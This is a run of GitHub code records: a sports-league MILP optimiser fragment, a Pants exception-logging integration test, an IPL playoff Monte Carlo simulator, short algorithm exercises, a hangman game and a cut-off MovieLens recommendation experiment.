self.y[i, j] + self.z[i, j] == 1)\n\n # Link p and x, y, z\n for i in self.teams:\n self.solver.Add(\n self.p[i] == sum(3 * self.x[i, j] + self.y[i, j] + self.y[j, i] + 3 * self.z[j, i]\n for j in self.teams if i != j)\n )\n\n # Constrain w\n self.solver.Add(sum(self.w[j] for j in self.teams if j != 1) == self.k - 1)\n\n # Link p and w\n for j in self.teams:\n if j == 1:\n continue\n self.solver.Add(self.p[j] <= self.p[1] + self.M * (1 - self.w[j]))\n self.solver.Add(self.p[1] <= self.p[j] + self.M * (self.w[j]))\n\n def define_objective(self):\n self.solver.Maximize(self.p[1])\n\n def solve_and_report(self):\n status = self.solver.Solve()\n if status == pywraplp.Solver.OPTIMAL:\n print('Objective value =', self.solver.Objective().Value())\n print('Problem solved in %f milliseconds' % self.solver.wall_time())\n print('Problem solved in %d iterations' % self.solver.iterations())\n print('Problem solved in %d branch-and-bound nodes' % self.solver.nodes())\n else:\n print('The problem does not have an optimal solution.')\n\n league = [\n (self.p[i].solution_value(), i,\n sum(self.x[i, j].solution_value() + self.z[j, i].solution_value() for j in self.teams if i != j),\n sum(self.y[i, j].solution_value() + self.y[j, i].solution_value() for j in self.teams if i != j),\n sum(self.z[i, j].solution_value() + self.x[j, i].solution_value() for j in self.teams if i != j))\n for i in self.teams\n ]\n # Build the league table as dataframe\n df = pd.DataFrame(league, columns=['points', 'team', 'wins', 'draws', 'losses'])\n df['team'] = df['team'].astype(int)\n df['wins'] = df['wins'].astype(int)\n df['draws'] = df['draws'].astype(int)\n df['losses'] = df['losses'].astype(int)\n df = 
df.sort_values(by=['points', 'wins', 'draws', 'losses'], ascending=False)\n df = df.reset_index(drop=True)\n print('\\nLeague table:')\n print(df)\n\n def run(self):\n self.define_variables()\n self.define_constraints()\n self.define_objective()\n self.solve_and_report()\n\n\nif __name__ == '__main__':\n sports_league = SportsLeagueOpti(18, 3)\n sports_league.run()\n","repo_name":"jsalva9/K-MST-with-MILP-optimization","sub_path":"problems/sports_league.py","file_name":"sports_league.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27765845659","text":"import os\nimport signal\nimport time\nfrom textwrap import dedent\n\nfrom pants.base.build_environment import get_buildroot\nfrom pants.base.exception_sink import ExceptionSink\nfrom pants.util.contextutil import environment_as, temporary_dir\nfrom pants.util.dirutil import read_file\nfrom pants_test.pantsd.pantsd_integration_test_base import PantsDaemonIntegrationTestBase\n\n\nclass ExceptionSinkIntegrationTest(PantsDaemonIntegrationTestBase):\n def _assert_unhandled_exception_log_matches(self, pid, file_contents):\n self.assertRegex(\n file_contents,\n \"\"\"\\\ntimestamp: ([^\\n]+)\nprocess title: ([^\\n]+)\nsys\\\\.argv: ([^\\n]+)\npid: {pid}\nException caught: \\\\([^)]*\\\\)\n(.|\\n)*\n\nException message:.* 1 Exception encountered:\n\n ResolveError: \"this-target-does-not-exist\" was not found in namespace \"\"\\\\. Did you mean one of:\n\"\"\".format(\n pid=pid\n ),\n )\n # Ensure we write all output such as stderr and reporting files before closing any streams.\n self.assertNotIn(\"Exception message: I/O operation on closed file.\", file_contents)\n\n def _get_log_file_paths(self, workdir, pid):\n pid_specific_log_file = ExceptionSink.exceptions_log_path(for_pid=pid, in_dir=workdir)\n self.assertTrue(os.path.isfile(pid_specific_log_file))\n\n shared_log_file = ExceptionSink.exceptions_log_path(in_dir=workdir)\n self.assertTrue(os.path.isfile(shared_log_file))\n\n self.assertNotEqual(pid_specific_log_file, shared_log_file)\n\n return (pid_specific_log_file, shared_log_file)\n\n def test_fails_ctrl_c_ffi_extern(self):\n with temporary_dir() as tmpdir:\n with environment_as(_RAISE_KEYBOARDINTERRUPT_IN_EXTERNS=\"True\"):\n pants_run = self.run_pants_with_workdir(\n self._lifecycle_stub_cmdline(), workdir=tmpdir\n )\n self.assert_failure(pants_run)\n\n self.assertIn(\n \"KeyboardInterrupt: ctrl-c interrupted execution of a ffi method!\",\n pants_run.stderr_data,\n )\n\n pid_specific_log_file, shared_log_file = self._get_log_file_paths(\n tmpdir, pants_run.pid\n )\n\n self.assertIn(\n \"KeyboardInterrupt: ctrl-c interrupted execution of a ffi method!\",\n read_file(pid_specific_log_file),\n )\n self.assertIn(\n \"KeyboardInterrupt: ctrl-c interrupted execution of a ffi method!\",\n read_file(shared_log_file),\n )\n\n def test_fails_ctrl_c_on_import(self):\n with temporary_dir() as tmpdir:\n with environment_as(_RAISE_KEYBOARDINTERRUPT_ON_IMPORT=\"True\"):\n # TODO: figure out the cwd of the pants subprocess, not just the \"workdir\"!\n pants_run = self.run_pants_with_workdir(\n self._lifecycle_stub_cmdline(), workdir=tmpdir\n )\n self.assert_failure(pants_run)\n\n self.assertIn(\n dedent(\n \"\"\"\\\n Interrupted by user:\n ctrl-c during import!\n \"\"\"\n ),\n pants_run.stderr_data,\n )\n\n pid_specific_log_file, shared_log_file = self._get_log_file_paths(\n tmpdir, pants_run.pid\n )\n\n self.assertEqual(\"\", 
read_file(pid_specific_log_file))\n self.assertEqual(\"\", read_file(shared_log_file))\n\n def test_logs_unhandled_exception(self):\n with temporary_dir() as tmpdir:\n pants_run = self.run_pants_with_workdir(\n [\"--no-enable-pantsd\", \"list\", \"//:this-target-does-not-exist\"],\n workdir=tmpdir,\n # The backtrace should be omitted when --print-exception-stacktrace=False.\n print_exception_stacktrace=False,\n )\n self.assert_failure(pants_run)\n self.assertRegex(\n pants_run.stderr_data,\n \"\"\"\\\n\"this-target-does-not-exist\" was not found in namespace \"\"\\\\. Did you mean one of:\n\"\"\",\n )\n pid_specific_log_file, shared_log_file = self._get_log_file_paths(tmpdir, pants_run.pid)\n self._assert_unhandled_exception_log_matches(\n pants_run.pid, read_file(pid_specific_log_file)\n )\n self._assert_unhandled_exception_log_matches(pants_run.pid, read_file(shared_log_file))\n\n def _assert_graceful_signal_log_matches(self, pid, signum, signame, contents):\n self.assertRegex(\n contents,\n \"\"\"\\\ntimestamp: ([^\\n]+)\nprocess title: ([^\\n]+)\nsys\\\\.argv: ([^\\n]+)\npid: {pid}\nSignal {signum} \\\\({signame}\\\\) was raised\\\\. Exiting with failure\\\\.\n\"\"\".format(\n pid=pid, signum=signum, signame=signame\n ),\n )\n # Ensure we write all output such as stderr and reporting files before closing any streams.\n self.assertNotIn(\"Exception message: I/O operation on closed file.\", contents)\n\n def test_dumps_logs_on_signal(self):\n \"\"\"Send signals which are handled, but don't get converted into a KeyboardInterrupt.\"\"\"\n signal_names = {\n signal.SIGQUIT: \"SIGQUIT\",\n signal.SIGTERM: \"SIGTERM\",\n }\n for (signum, signame) in signal_names.items():\n with self.pantsd_successful_run_context() as ctx:\n ctx.runner([\"help\"])\n pid = ctx.checker.assert_started()\n os.kill(pid, signum)\n\n time.sleep(5)\n\n # Check that the logs show a graceful exit by signal.\n pid_specific_log_file, shared_log_file = self._get_log_file_paths(ctx.workdir, pid)\n self._assert_graceful_signal_log_matches(\n pid, signum, signame, read_file(pid_specific_log_file)\n )\n self._assert_graceful_signal_log_matches(\n pid, signum, signame, read_file(shared_log_file)\n )\n\n def test_dumps_traceback_on_sigabrt(self):\n # SIGABRT sends a traceback to the log file for the current process thanks to\n # faulthandler.enable().\n with self.pantsd_successful_run_context() as ctx:\n ctx.runner([\"help\"])\n pid = ctx.checker.assert_started()\n os.kill(pid, signal.SIGABRT)\n\n time.sleep(5)\n\n # Check that the logs show an abort signal and the beginning of a traceback.\n pid_specific_log_file, shared_log_file = self._get_log_file_paths(ctx.workdir, pid)\n self.assertRegex(\n read_file(pid_specific_log_file),\n \"\"\"\\\nFatal Python error: Aborted\n\nThread [^\\n]+ \\\\(most recent call first\\\\):\n\"\"\",\n )\n # faulthandler.enable() only allows use of a single logging file at once for fatal tracebacks.\n self.assertEqual(\"\", read_file(shared_log_file))\n\n def test_prints_traceback_on_sigusr2(self):\n with self.pantsd_successful_run_context() as ctx:\n ctx.runner([\"help\"])\n pid = ctx.checker.assert_started()\n os.kill(pid, signal.SIGUSR2)\n\n time.sleep(5)\n\n ctx.checker.assert_running()\n self.assertRegex(\n read_file(os.path.join(ctx.workdir, \"pantsd\", \"pantsd.log\")),\n \"\"\"\\\nCurrent thread [^\\n]+ \\\\(most recent call first\\\\):\n\"\"\",\n )\n\n def _lifecycle_stub_cmdline(self):\n # Load the testprojects pants-plugins to get some testing tasks and subsystems.\n 
testproject_backend_src_dir = os.path.join(\n get_buildroot(), \"testprojects/pants-plugins/src/python\"\n )\n testproject_backend_pkg_name = \"test_pants_plugin\"\n lifecycle_stub_cmdline = [\n \"--no-enable-pantsd\",\n f\"--pythonpath=+['{testproject_backend_src_dir}']\",\n f\"--backend-packages=+['{testproject_backend_pkg_name}']\",\n # This task will always raise an exception.\n \"lifecycle-stub-goal\",\n ]\n\n return lifecycle_stub_cmdline\n","repo_name":"mgrenonville/pants","sub_path":"tests/python/pants_test/base/test_exception_sink_integration.py","file_name":"test_exception_sink_integration.py","file_ext":"py","file_size_in_byte":8256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"9350592461","text":"from multiprocessing import Pool\nfrom datetime import *\nfrom enum import *\nimport operator\nimport copy\nimport pprint\nimport re\nfrom secrets import randbelow\n\nMAX_FIXTURE = 56\nCURRENT_MATCH = 25\nENABLE_CONSOLE_LOG = False\n\nmatches_left = MAX_FIXTURE - CURRENT_MATCH + 1\ncurrent_match_index = CURRENT_MATCH\ntotal_simulations = pow(2, matches_left)\ntotal_batches = pow(10, 6)\nprogress_percent = total_batches / 100\nbatch_size = max(total_simulations, round(total_simulations / total_batches))\n\nmonte_carlo_simulations = pow(10, 4)\nmonte_carlo_batch = 100\ntotal_monte_carlo_simulations = monte_carlo_simulations * monte_carlo_batch\npp = pprint.PrettyPrinter(indent=4)\n\n\nclass Key:\n GUARANTEED_TOP2 = \"guaranteed2\"\n GUARANTEED_TOP4 = \"guaranteed4\"\n NRR_TOP2 = \"nrr2\"\n NRR_TOP4 = \"nrr4\"\n\n\nclass Team:\n CSK = \"CSK\"\n SRH = \"SRH\"\n RCB = \"RCB\"\n MI = \"MI\"\n KXIP = \"KXIP\"\n DC = \"DC\"\n KKR = \"KKR\"\n RR = \"RR\"\n\n list = [CSK, SRH, RCB, MI, KXIP, DC, KKR, RR]\n\n\nclass Constants:\n # MAX_FIXTURE = 56\n\n points = {Team.CSK: 10,\n Team.SRH: 6,\n Team.RCB: 0,\n Team.MI: 8,\n Team.KXIP: 8,\n Team.DC: 6,\n Team.KKR: 8,\n Team.RR: 2}\n\n nrr = {Team.CSK: 0.220,\n Team.SRH: 0.28,\n Team.RCB: 0.129,\n Team.MI: 0.32,\n Team.KXIP: -0.490,\n Team.DC: -0.22,\n Team.KKR: -0.07,\n Team.RR: -0.246}\n\n adjusted_points = {}\n\n def __init__(self):\n self.reset_adjusted_points()\n\n def reset_adjusted_points(self):\n for team in self.points.keys():\n self.adjusted_points[team] = self.points[team] + self.nrr[team] / 100\n\n fixture = {\n 23: (Team.CSK, Team.KKR),\n 24: (Team.MI, Team.KXIP),\n 25: (Team.RR, Team.CSK),\n 26: (Team.KKR, Team.DC),\n 27: (Team.MI, Team.RR),\n 28: (Team.KXIP, Team.RCB),\n 29: (Team.KKR, Team.CSK),\n 30: (Team.SRH, Team.DC),\n 31: (Team.MI, Team.RCB),\n 32: (Team.KXIP, Team.RR),\n 33: (Team.SRH, Team.CSK),\n 34: (Team.DC, Team.MI),\n 35: (Team.KKR, Team.RCB),\n 36: (Team.RR, Team.MI),\n 37: (Team.DC, Team.KXIP),\n 38: (Team.SRH, Team.KKR),\n 39: (Team.RCB, Team.CSK),\n 40: (Team.RR, Team.DC),\n 41: (Team.CSK, Team.SRH),\n 42: (Team.RCB, Team.KXIP),\n 43: (Team.KKR, Team.RR),\n 44: (Team.CSK, Team.MI),\n 45: (Team.RR, Team.SRH),\n 46: (Team.DC, Team.RCB),\n 47: (Team.KKR, Team.MI),\n 48: (Team.SRH, Team.KXIP),\n 49: (Team.RCB, Team.RR),\n 50: (Team.CSK, Team.DC),\n 51: (Team.MI, Team.SRH),\n 52: (Team.KXIP, Team.KKR),\n 53: (Team.DC, Team.RR),\n 54: (Team.RCB, Team.SRH),\n 55: (Team.KXIP, Team.CSK),\n 56: (Team.MI, Team.KKR)\n }\n\n\ndef play():\n b = list(range(total_batches))\n p = Pool(8, )\n print(\"Total sim = \", \"{:,}\".format(total_simulations))\n console_log(\"started\")\n results = p.map(simulate, b)\n print(\"\\n\")\n console_log(\"reducing ...\")\n f = reduce(results)\n 
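# Sketch of the reduced structure printed below: per-team tallies summed across batches,\n    # e.g. {Key.GUARANTEED_TOP2: {team: count, ...}, Key.NRR_TOP2: {...}, Key.GUARANTEED_TOP4: {...}, Key.NRR_TOP4: {...}}\n    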
pp.pprint(f)\n console_log(\"ended\")\n\n\ndef pool_initializer():\n global current_match_index\n\n\ndef play_montecarlo():\n global current_match_index\n b = list(range(monte_carlo_batch))\n p = Pool(8, pool_initializer)\n console_log(\"Total sim = \", \"{:,}\".format(total_monte_carlo_simulations))\n console_log(\"started\")\n results = p.map(simulate_monte_carlo, b)\n print(\"\\n\")\n console_log(\"reducing ...\")\n cur_result = reduce(results)\n print(\n f\"\\nMonte Carlo probability **after match {CURRENT_MATCH - 1} : {Constants.fixture[CURRENT_MATCH-1][0]} vs {Constants.fixture[CURRENT_MATCH-1][1]}**\\n\")\n output_table(total_monte_carlo_simulations, cur_result, use_elimination=False)\n\n team1, team2 = Constants.fixture[CURRENT_MATCH]\n current_match_index = CURRENT_MATCH + 1\n print(f\"\\n\\n \\n\\nIf **{team1}** wins match {CURRENT_MATCH} {team1} vs {team2} : \")\n Constants.points[team1] += 2\n p = Pool(8, pool_initializer)\n team1_result = reduce(p.map(simulate_monte_carlo, b))\n output_table(total_monte_carlo_simulations, team1_result, use_elimination=False)\n Constants.points[team1] -= 2\n\n print(f\"\\n\\n \\n\\nIf **{team2}** wins match {CURRENT_MATCH} {team1} vs {team2} : \")\n Constants.points[team2] += 2\n p = Pool(8, pool_initializer)\n team2_result = reduce(p.map(simulate_monte_carlo, b))\n output_table(total_monte_carlo_simulations, team2_result, use_elimination=False)\n Constants.points[team2] -= 2\n current_match_index = CURRENT_MATCH\n\n print(\"\\n\\n \\n\\n^(**Notes:**)\")\n print(\n \"\\n\\n^(1.**Monte Carlo** - this is NOT accurate. This is how it works - it picks a match, flips a coin and decides the winner. Repeat till the end of all the league matches. Figure out who qualified. Repeat the whole process for a large number of times and get the %.)\")\n print(\n \"\\n\\n^(2.Why is there a range of percentage: its because of NRR situation. For eg 80-90% means 80% of the time, the team can qualify without involving NRR. 90% if the team has top NRR. 
Somewhere in between if the NRR is mediocre)\")\n print(\"\\n\\n\\n\")\n\n # pp.pprint(cur_result)\n console_log(\"ended\")\n\n\ndef output_table(total, results, match_offset=None, highlight_team=None, use_elimination=True):\n if match_offset is None:\n match_offset = current_match_index\n header = \"Team | Pt | ^(Matches Left) | ^(Top 4) | ^(Top 2)\"\n print(\"\\n\\n\" + header)\n print(get_header_dashes(header))\n\n sorting_table = {}\n for team in Team.list:\n sorting_table.setdefault(team, (results[Key.GUARANTEED_TOP4][team],\n results[Key.NRR_TOP4][team],\n results[Key.GUARANTEED_TOP2][team],\n results[Key.NRR_TOP2][team]))\n\n sorted_table = sorted(sorting_table.items(), key=lambda x: (x[1][0], x[1][1], x[1][2], x[1][3]), reverse=True)\n for qt in sorted_table:\n team = qt[0]\n team_txt = team if team != highlight_team else \"**\" + team + \"**\"\n top4 = f\"{get_percentage(results[Key.GUARANTEED_TOP4][team], total)}-{get_percentage(results[Key.NRR_TOP4][team], total)}%\"\n top2 = f\"{get_percentage(results[Key.GUARANTEED_TOP2][team], total)}-{get_percentage(results[Key.NRR_TOP2][team], total)}%\"\n eliminated = \"~~\" if use_elimination and sum([results[Key.GUARANTEED_TOP4][team], results[Key.NRR_TOP4][team],\n results[Key.GUARANTEED_TOP2][team], results[Key.NRR_TOP2][team]]) == 0 else \"\"\n print(f\"{eliminated}{team_txt}{eliminated} | \"\n f\"{eliminated}{Constants.points[team]}{eliminated} | \"\n f\"{get_remaining_match_count(team, match_offset)} | \"\n f\"{eliminated}{top4}{eliminated} | \"\n f\"{eliminated}{top2}{eliminated} | \"\n )\n print(\"\\nTotal Simulations : \", \"{:,}\".format(total), \"\\n\")\n\n\ndef get_percentage(x, total_counter):\n percent = round(100 * x / total_counter)\n if percent == 100 and x != total_counter or percent == 0 and x != 0:\n percent = round(100 * x / total_counter, 2)\n return percent\n\n\ndef get_remaining_match_count(team, start_from=CURRENT_MATCH):\n count = 0\n for i in range(start_from, 57):\n match = Constants.fixture[i]\n if match[0] == team or match[1] == team:\n count += 1\n return count\n\n\ndef console_log(*args):\n if not ENABLE_CONSOLE_LOG:\n return\n print(datetime.now(), \"\\t\", end=\"\")\n for a in args:\n print(a, end=\" \")\n print(\"\\n\")\n\n\ndef reduce(results):\n final = {\n Key.GUARANTEED_TOP2: get_team_init_counter(),\n Key.GUARANTEED_TOP4: get_team_init_counter(),\n Key.NRR_TOP2: get_team_init_counter(),\n Key.NRR_TOP4: get_team_init_counter()\n }\n for r in results:\n if r is None: continue\n for k in [Key.GUARANTEED_TOP2, Key.GUARANTEED_TOP4, Key.NRR_TOP2, Key.NRR_TOP4]:\n for team in Team.list:\n final[k][team] += r[k][team]\n return final\n\n\ndef simulate(batch_no):\n global current_match_index\n if ENABLE_CONSOLE_LOG and batch_no % progress_percent == 0:\n print(\"\\r\", round(100 * batch_no / total_batches), \"%\", end=' ', flush=True)\n\n result = {\n Key.GUARANTEED_TOP2: get_team_init_counter(),\n Key.GUARANTEED_TOP4: get_team_init_counter(),\n Key.NRR_TOP2: get_team_init_counter(),\n Key.NRR_TOP4: get_team_init_counter()\n }\n start = batch_no * batch_size\n end = min(start + batch_size, total_simulations)\n if start >= end:\n return None\n for i in range(start, end):\n points = copy.deepcopy(Constants.points)\n for j in range(matches_left):\n match_index = current_match_index + j\n winner_binary_index = randbelow(2)\n winner = Constants.fixture[match_index][winner_binary_index]\n points[winner] += 2\n evaluate_combo(result, points)\n\n return result\n\n\ndef simulate_monte_carlo(batch_no):\n if 
ENABLE_CONSOLE_LOG:\n print(\"\\r\", round(100 * batch_no / monte_carlo_batch), \"%\", end=' ', flush=True)\n\n result = {\n Key.GUARANTEED_TOP2: get_team_init_counter(),\n Key.GUARANTEED_TOP4: get_team_init_counter(),\n Key.NRR_TOP2: get_team_init_counter(),\n Key.NRR_TOP4: get_team_init_counter()\n }\n for i in range(monte_carlo_simulations):\n points = copy.deepcopy(Constants.points)\n for match_index in range(current_match_index, matches_left):\n winner_binary_index = randbelow(2)\n winner = Constants.fixture[match_index][winner_binary_index]\n points[winner] += 2\n evaluate_combo(result, points)\n\n return result\n\n\ndef get_team_init_counter():\n return {Team.CSK: 0,\n Team.SRH: 0,\n Team.RCB: 0,\n Team.MI: 0,\n Team.KXIP: 0,\n Team.DC: 0,\n Team.KKR: 0,\n Team.RR: 0}\n\n\n#\ndef evaluate_combo(result, points, log_non_qualifying_team=None):\n # # global c\n # # global total_counter\n # self.total_counter += 1\n # points_chain = copy.deepcopy(self.c.points)\n # adjusted_points_chain = copy.deepcopy(self.c.adjusted_points)\n #\n # for winner in chain:\n # points_chain[winner] += 2\n # adjusted_points_chain[winner] += 2\n #\n # if self.log_all_combo:\n # self.log_scenario(chain, points_chain)\n #\n # # evaluate top 4\n sorted_points_chain = sorted(points.items(), key=operator.itemgetter(1), reverse=True)\n # # qualifying with NRR : keep adding to bucket top 4 items, then add any other matching #4's score\n # # qualifying without NRR : add if points\n\n fourth_team_point = sorted_points_chain[3][1]\n second_team_point = sorted_points_chain[1][1]\n qualifying_without_nrr = []\n qualifying_without_nrr_candidate = []\n qualifying_top2_without_nrr = []\n qualifying_top2_without_nrr_candidate = []\n # not_qual_nrr = {}\n\n for i in range(0, len(sorted_points_chain)):\n team = sorted_points_chain[i][0]\n point = sorted_points_chain[i][1]\n # qualifying with NRR : teams 1-4, plus any team tieing with 4\n if i < 4 or point == fourth_team_point:\n result[Key.NRR_TOP4][team] += 1\n if i < 2 or point == second_team_point:\n result[Key.NRR_TOP2][team] += 1\n # else:\n # not_qual_nrr[team] = 1\n # qualifying without NRR:\n # if point > 4th team point, then add to qualifying bucket\n # if point = 4th team point then add to candidate bucket\n if point > fourth_team_point:\n qualifying_without_nrr.append(team)\n elif point == fourth_team_point:\n qualifying_without_nrr_candidate.append(team)\n\n if point > second_team_point:\n qualifying_top2_without_nrr.append(team)\n elif point == second_team_point:\n qualifying_top2_without_nrr_candidate.append(team)\n\n # if qualifying + candidate = 4 then add, else discard candidate\n if len(qualifying_without_nrr) + len(qualifying_without_nrr_candidate) == 4:\n qualifying_without_nrr += qualifying_without_nrr_candidate\n for team in qualifying_without_nrr:\n result[Key.GUARANTEED_TOP4][team] += 1\n\n if len(qualifying_top2_without_nrr) + len(qualifying_top2_without_nrr_candidate) == 2:\n qualifying_top2_without_nrr += qualifying_top2_without_nrr_candidate\n for team in qualifying_top2_without_nrr:\n result[Key.GUARANTEED_TOP2][team] += 1\n\n # if log_non_qualifying_team is not None and log_non_qualifying_team not in qualifying_without_nrr:\n # self.log_non_qualifying_scenario(chain, points_chain)\n\n # using current NRR as trend\n # sorted_adjusted_points_chain = sorted(adjusted_points_chain.items(), key=operator.itemgetter(1), reverse=True)\n # for t in sorted_adjusted_points_chain[:4]:\n # self.qualify_with_current_nrr_counter[t[0]] += 1\n # if t[0] in 
not_qual_nrr:\n # self.log_scenario(chain, points_chain)\n\n\ndef get_header_dashes(txt):\n return re.sub(\"[^|]\", \"-\", txt)\n\n\n#\n#\n# if __name__ == '__main__':\n#\n# t1 = datetime.now()\n# for i in range(1000000000):\n# a = 1\n# t2 = datetime.now()\n#\n# print(\"Elapsed = \", t2 - t1)\n\n# play()\nplay_montecarlo()\n","repo_name":"ammachan/ipl","sub_path":"ipl3.py","file_name":"ipl3.py","file_ext":"py","file_size_in_byte":13424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28484169714","text":"# https://codeforces.com/gym/421768/problem/B\n\nn, d = [int(i) for i in input().split()]\npower = sorted(int(i) for i in input().split())\n\nrep = n - 1\nfol = 0\nwins = 0\n\nwhile fol <= rep:\n need = d // power[rep]\n fol += need\n \n if fol <= rep and (need + 1) * power[rep] > d:\n wins += 1\n \n rep -= 1\n \nprint(wins)\n","repo_name":"nawrazi/competitive-programming","sub_path":"week_54/basketball-together.py","file_name":"basketball-together.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25792313794","text":"# 232 Implement Queue using Stacks\n\"\"\"\nQueue is FIFO (first in - first out) data structure, \nin which the elements are inserted from one side - rear \nand removed from the other - front. \n\nThe most intuitive way to implement it is with linked lists, \nbut this article will introduce another approach using stacks. \n\nStack is LIFO (last in - first out) data structure, \nin which elements are added and removed from the same end, called top. \n\nTo satisfy FIFO property of a queue we need to keep two stacks. \nThey serve to reverse arrival order of the elements and \none of them store the queue elements in their final order.\n\"\"\"\n\n# Two stacks\n# Push - O(1)\n# Pop - O(1)\nclass MyQueue(object):\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.front = []\n self.back = []\n \n\n def push(self, x):\n \"\"\"\n Push element x to the back of queue.\n :type x: int\n :rtype: None\n \"\"\"\n self.back.append(x)\n \n\n def pop(self):\n \"\"\"\n Removes the element from in front of queue and returns that element.\n :rtype: int\n \"\"\"\n if self.front:\n return self.front.pop()\n else:\n while self.back:\n self.front.append(self.back.pop())\n\n if self.front:\n return self.front.pop()\n else:\n return None\n \n\n def peek(self):\n \"\"\"\n Get the front element.\n :rtype: int\n \"\"\"\n if self.front:\n return self.front[-1]\n else:\n while self.back:\n self.front.append(self.back.pop())\n\n if self.front:\n return self.front[-1]\n else:\n return None\n \n\n def empty(self):\n \"\"\"\n Returns whether the queue is empty.\n :rtype: bool\n \"\"\"\n if not self.front and not self.back:\n return True\n else:\n return False\n \n\n\n# Your MyQueue object will be instantiated and called as such:\n# obj = MyQueue()\n# obj.push(x)\n# param_2 = obj.pop()\n# param_3 = obj.peek()\n# param_4 = obj.empty()","repo_name":"yananfei-Bette/Leetcode","sub_path":"interview/amazon/amazon_vo/232_Implement_Queue_using_Stacks.py","file_name":"232_Implement_Queue_using_Stacks.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10079442757","text":"from data import *\nfrom fonctions import * \n\nscores = retreive_score()\nuser = retreive_user_name()\n\nif user not in scores.keys():\n scores[user] 
+{"seq_id":"10079442757","text":"from data import *\nfrom fonctions import *\n\nscores = retreive_score()\nuser = retreive_user_name()\n\nif user not in scores.keys():\n    scores[user] = 0\ncontinuer_partie = 'o'\n\nwhile continuer_partie != 'n':\n    print (\"player {0}: {1} point(s)\" .format(user, scores[user]))\n    word_to_find = choose_word()\n    found_words = []\n    find_word = retreive_mask_word(word_to_find,found_words)\n    nb_chances = nb_coups\n    while word_to_find != find_word and nb_chances > 0:\n        print ( \"word to find: {0} ({1} chances left)\" .format(find_word,nb_chances))\n        letter = retreive_letter()\n        if letter in found_words:\n            print (\"you have already found this letter\") \n        elif letter in word_to_find:\n            found_words.append(letter)\n            print (\"good job\")\n            print ( \"word to find: {0}\" .format(find_word))\n        \n        else: \n            nb_chances -= 1\n            print (\".. no, this letter is not in this word\")\n        find_word = retreive_mask_word(word_to_find,found_words)\n    if word_to_find == find_word:\n        print (\"bravo, you have found {0}.\" .format(word_to_find))\n    else:\n        print (\"you lost, you have been hanged\")\n    scores[user] += nb_chances\n    continuer_partie = input (\"do you want to continue? o/n \")\n    continuer_partie = continuer_partie.lower()\nsave_score(scores)\n\nprint (\"you finished the game with {0} point(s)\". format(scores[user]))\n    \n    \n    \n\n\n","repo_name":"danprasfr/TrainingProject","sub_path":"Exercice2/Ga_pen.py","file_name":"Ga_pen.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
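# The hangman game above imports retreive_mask_word from a `fonctions` module
# that is not included in this dataset; the minimal implementation sketched
# here is an assumption, added only to clarify how the game loop reveals
# letters. The behaviour (mask unguessed letters with '*') is inferred from usage.
def retreive_mask_word(word, found_letters):
    # Reveal the letters guessed so far and mask the rest with '*'.
    return "".join(c if c in found_letters else "*" for c in word)

assert retreive_mask_word("python", ["p", "o"]) == "p***o*"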
+{"seq_id":"70517669033","text":"\n# Run some recommendation experiments using MovieLens 100K\nimport pandas\nimport numpy as np \nimport scipy.sparse\nimport scipy.sparse.linalg\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.metrics.pairwise import cosine_similarity\n\ndef euclidean_distance(v1, v2):\n\treturn np.linalg.norm(v1 - v2)\n\ndef greedy_select(X, trials=10): \n\t'''\n\tGreedily select points according to which is \n\tclosest to any previously seen sample\n\n\tDistance Metric: Euclidean \n\t'''\n\n\tk = 2 # For visualization\n\tn = X.shape[0]\n\n\tU, s, Vt = np.linalg.svd(X, full_matrices=False)\n\n\tX_svd = U[:, 0:k].dot(np.diag(s[0:k]))\n\n\t# Select first point (def not random)\n\tseen = [0]\n\tfor _ in range(trials):\n\n\t\t# Looking for point with smallest minimum distance\n\t\tmin_seen = [float('inf'), -1]\n\t\tfor i in [x for x in range(n) if x not in seen]:\n\t\t\tfor j in seen:\n\t\t\t\tv1 = X_svd[i,:]\n\t\t\t\tv2 = X_svd[j,:]\n\t\t\t\t#dist = 1.0 - cosine_similarity(v1, v2)[0][0]\n\t\t\t\t#dist = cosine_similarity(v1, v2)[0][0]\n\t\t\t\tdist = euclidean_distance(v1, v2)\n\t\t\t\tif dist < min_seen[0]:\n\t\t\t\t\tmin_seen = [dist, i]\n\n\t\tseen.append(min_seen[1])\n\t\t\n\t\tplt.scatter(X_svd[:,0], X_svd[:,1], c=categories, alpha=0.01)\n\t\tplt.scatter(X_svd[seen,0], X_svd[seen,1], s=100,c=[0.0]*len(seen), alpha=0.7)\n\t\tplt.show()\n\n\tprint(seen)\n\n\treturn\n\ndef antigreedy_select(X, trials=10):\n\t'''\n\tSelect points according to which is \n\tfurthest from any previously seen sample\n\n\tDistance Metric: Euclidean\n\t'''\n\n\tk = 2 # For visualization\n\tn = X.shape[0]\n\n\tU, s, Vt = np.linalg.svd(X, full_matrices=False)\n\n\tX_svd = U[:, 0:k].dot(np.diag(s[0:k]))\n\n\t# Select first point (def not random)\n\tseen = [0]\n\tfor _ in range(trials):\n\n\t\t# Looking for point with largest minimum distance\n\t\tmax_min_seen = [float('-inf'), -1]\n\n\t\t# For each potential sample\n\t\tfor i in [x for x in range(n) if x not in seen]:\n\n\t\t\t# Calculate the minimum distance\n\t\t\tmin_seen = [float('inf'), -1]\n\n\t\t\t# To all previously seen samples\n\t\t\tfor j in seen:\n\t\t\t\tv1 = X_svd[i,:]\n\t\t\t\tv2 = X_svd[j,:]\n\t\t\t\t#dist = 1.0 - cosine_similarity(v1, v2)[0][0]\n\t\t\t\t#dist = cosine_similarity(v1, v2)[0][0]\n\t\t\t\tdist = euclidean_distance(v1, v2)\n\t\t\t\tif dist < min_seen[0]:\n\t\t\t\t\tmin_seen = [dist, i]\n\n\t\t\tif min_seen[0] > max_min_seen[0]:\n\t\t\t\tmax_min_seen = 